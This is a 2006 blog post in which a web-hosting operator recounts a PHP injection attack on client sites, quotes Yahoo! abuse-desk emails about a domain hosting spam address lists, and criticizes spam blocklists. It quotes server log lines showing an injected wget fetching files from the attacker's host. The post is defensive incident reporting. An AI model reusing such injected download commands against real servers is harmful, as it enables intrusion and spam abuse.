http://weblog.infoworld.com/enterprisemac/archives/2006/06/showering_after.html

Clever in the usual Yager style, but I’m going to disagree with him on this hot topic.  I’ll leave it at that for now.

http://news.com.com/2110-1030_3-6085599.html

Watch this one closely…

Rarely would I engage a competitor on a public level. However, this situation warrants public notice.

On Sunday, June 11th, 2006 two of the servers on our network contained client hosted sites which were the victim of php injection exploited attacks. Tracing the responsible parties was relatively seamless, a thorough grep through relevant apache logs yielded both the client PHP applications on our servers and the remote sites participating in the attack.

Before I go further, let me be clear in stating that we do not in anyway declare Yahoo! Inc. or any employee of Yahoo! Inc. a participant in spamming or any form of exploitation attack.

That being said, here is what a sample attack yielded from the logs one of our servers:

Resolving lolz.us… 216.39.58.70, 216.39.58.65, 216.39.58.66, …
Connecting to lolz.us|216.39.58.70|:80… connected.
–07:15:28– http://lolz.us/chinez/listb-0012.txt
Resolving lolz.us… 216.39.58.70, 216.39.58.65, 216.39.58.66, …

We were able to pinpoint this behavior through analysis of running processes on the server, further narrowing those malicious processes to specific environment variables within the server.

The log snippit is a segment of a remote exploit of a PHP application on a client hosted site on our network (we will be retaining these logs indefinitely), in turn using the ‘wget’ command via injection of malicious POST variables to a poorly written PHP application, to pull which we later discovered to be a series of text files containing email addresses from “lolz.us/chinez”

Any intelligent person can only imagine what then transpired — after the spam campaigns and malicious running processes were disabled, we notified the web hosting operator responsible for hosting “lolz.us” (Yahoo! Inc.) and waited for their reply. Clearly the attacks were not originating from Yahoo! Inc. web hosting, rather the attack was pulling text files from their network containing lists for which were clearly being used for the purposes of bulk spamming.
Monday morning rolled in and I received the following message (original message included):

Return-Path:
Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34])
by redux.networkredux.com (8.12.11.20060308/8.12.11) with ESMTP id k5CBI4Pb032453
(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
for ; Mon, 12 Jun 2006 04:18:04 -0700
Received: from speedster.cc.kana.corp.yahoo.com (speedster.cc.kana.corp.yahoo.com [207.126.228.28])
by mail-relay1.yahoo.com (8.13.6/8.13.6/mr1) with SMTP id k5CBIn9A053390
for ; Mon, 12 Jun 2006 04:19:00 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; s=serpent; d=yahoo-inc.com; c=nofws; q=dns;
h=date:to:subject:from:reply-to:mime-version:content-type:
content-transfer-encoding:x-mailer;
b=h159P3NmQyaNFvSXoBLy10mdUQbwgN9gHrrFFZq1GMXaNytwjCb1sNJEM2CZp544
Message-Id: <200606121119.k5CBIn9A053390@mail-relay1.yahoo.com>
Date: Mon, 12 Jun 2006 04:18:59 -0700
To: Thomas Subject: Re: Site hosting mail spam lists (KMM32897062V10993L0KM)
From: Yahoo! Domains
Reply-To: Yahoo! Domains
MIME-Version: 1.0
Content-Type: text/plain; charset = “us-ascii”
Content-Transfer-Encoding: 7bit
X-Mailer: KANA Response 7.0.1.142
X-Spam-Status: No, hits=0.0 required=5.0
tests=none
version=2.55
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)

Dear Thomas,

Thank you for writing to Yahoo! Domains.

Thank you for informing us of this incident.

Please write back with a more detailed description of the issue in
question and include as much of the following information as you can:

1. The exact and full location of the Yahoo! Domains home page and any
specific file names or HTML pages. (ex: http://www.name_of_domain.com)

2. A detailed description of the complaint or issue.

3. Any other information that may help us investigate and take the
appropriate action.

Please include the requested information in the body of your email
response, and do not send attachments as we are unable to open them.

Additionally, you may want to review the Yahoo! Domains Terms of Service
at:

http://smallbusiness.yahoo.com/tos/tos.php

Thank you again for contacting Yahoo! Customer Care.

Regards,

Sean Philips

Yahoo! Customer Care

http://www.yahoo.com/

23361483

Original Message Follows:
————————-

>>REDFRMADV

The site in question on your services is http://lolz.us/chinez

This url was in our logs as requested for spam lists to generate and
farm.

Regards,

Thomas Brenneke
Network Redux, LLC

I then responded with the following:

Mime-Version: 1.0 (Apple Message framework v746.2)
In-Reply-To: <200606121119.k5CBIn9A053390@mail-relay1.yahoo.com>
References: <200606121119.k5CBIn9A053390@mail-relay1.yahoo.com>
Content-Type: multipart/alternative;
boundary=Apple-Mail-1-26112430
Message-Id:
From: Thomas Subject: Re: Site hosting mail spam lists (KMM32897062V10993L0KM)
Date: Mon, 12 Jun 2006 12:06:44 -0500
To: Yahoo! Domains

–Apple-Mail-1-26112430
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
charset=US-ASCII;
delsp=yes;
format=flowed

>
> 1. The exact and full location of the Yahoo! Domains home page and any
> specific file names or HTML pages. (ex: http://www.name_of_domain.com)

http://lolz.us/chinez/

http://lolz.us/chinez/listb-001.txt (a sample)

Here you will find thousands of email addresses this person has
farmed which he uses to send his unsolicited bulk maililngs.

If you do not take this domain down we will have no problem with
informing the federal authorities of the activities going on with a
domain on your network.

> 2. A detailed description of the complaint or issue.

A remote attacker that accessed our network pulled these mailing list
files from the domain on your network to issue a spam campaign from
our network.

I was then greeted with the following:

Return-Path:
Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34])
by redux.networkredux.com (8.12.11.20060308/8.12.11) with ESMTP id k5D2AXHF011958
(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
for ; Mon, 12 Jun 2006 19:10:33 -0700
Received: from speedster.cc.kana.corp.yahoo.com (speedster.cc.kana.corp.yahoo.com [207.126.228.28])
by mail-relay1.yahoo.com (8.13.6/8.13.6/mr1) with SMTP id k5D2BPqL004222
for ; Mon, 12 Jun 2006 19:11:30 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; s=serpent; d=yahoo-inc.com; c=nofws; q=dns;
h=date:to:subject:from:reply-to:mime-version:content-type:
content-transfer-encoding:x-mailer;
b=Phlb2vuaKvyztnbaO0zlJWEVf6Idce5SOv2TR/b8O65Ge6iGeAw94b+KQET3OXYV
Message-Id: <200606130211.k5D2BPqL004222@mail-relay1.yahoo.com>
Date: Mon, 12 Jun 2006 19:11:29 -0700
To: Thomas Subject: Re: Site hosting mail spam lists (KMM32925908V64510L0KM)
From: Yahoo! Domains
Reply-To: Yahoo! Domains
MIME-Version: 1.0
Content-Type: text/plain; charset = “us-ascii”
Content-Transfer-Encoding: 7bit
X-Mailer: KANA Response 7.0.1.142
X-Spam-Status: No, hits=0.8 required=5.0
tests=QUOTED_EMAIL_TEXT,SUBJ_HAS_UNIQ_ID
version=2.55
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)

Dear Thomas,

Thank you for writing to Yahoo! Domains.

Thank you for informing us of possible abuse on Yahoo! Domains. We have
investigated the site and taken the necessary action. Please continue to
notify us of any content you believe violates the Yahoo! Domains Terms
of Service, located at:

http://smallbusiness.yahoo.com/tos/tos.php

Thank you again for contacting Yahoo! Customer Care.

Regards,

Harold Quincy

Yahoo! Customer Care

http://www.yahoo.com/

23361483

I then attempted to view the previously discussed URLs/files in question. To my dismay they were still ever so present, and still being hosted by Yahoo! Inc. web hosting services.

At this point, it appears the only way to get this site disabled is to make a little bit of public noise, as the abuse department of Yahoo! Inc. web hosting is apparently unable to comprehend the malicious nature of this site in question.

Attached: Screen shots as of 8:44PM PST June 12th, 2006.

Screen Shot 1: Yahoo 1

Screen Shot 2: Yahoo 1

Screen Shot 3: Yahoo 1

A scenario which occurs frequently is reason enough for avoiding spamcop or a similar entity in your spam fighting campaigns…

Take a random user on our network. This user has a standard domain hosted on our servers, which includes email services (pop3/imap/forwarders, etc.). This user also has an email address with their ISP, which they use as they primary mailbox.

In turn, this user has their @domain.com mailboxes with our hosting services forwarded to their @ISP mailbox.

A spam message destined for a mailbox @domain.com in turn gets forwarded to their @ISP mailbox. The user unknowingly sees this as generic spam and reports it to their ISP as well as other organizations such as spamcop.

Careful view of the email headers will indicate that the spam message came from a specific sender, was then bounced through the Network Redux server, and then hit the users @ISP mailbox.

Spamcop and AOL, as examples, do not detect or take into account any differences from an open relay, and a mail forwarding service. As a result not only will the sender be listed, the Network Redux server is listed as well.

As a web hosting provider we deal with this nonsense on a weekly basis, and there is very little that can be done about it.

Network and email administrators should be entirely leery of using RBLs in conjunction with mail delivery services, as they are prone to false positives as a result of these analytical mechanisms for tracing the source of spam.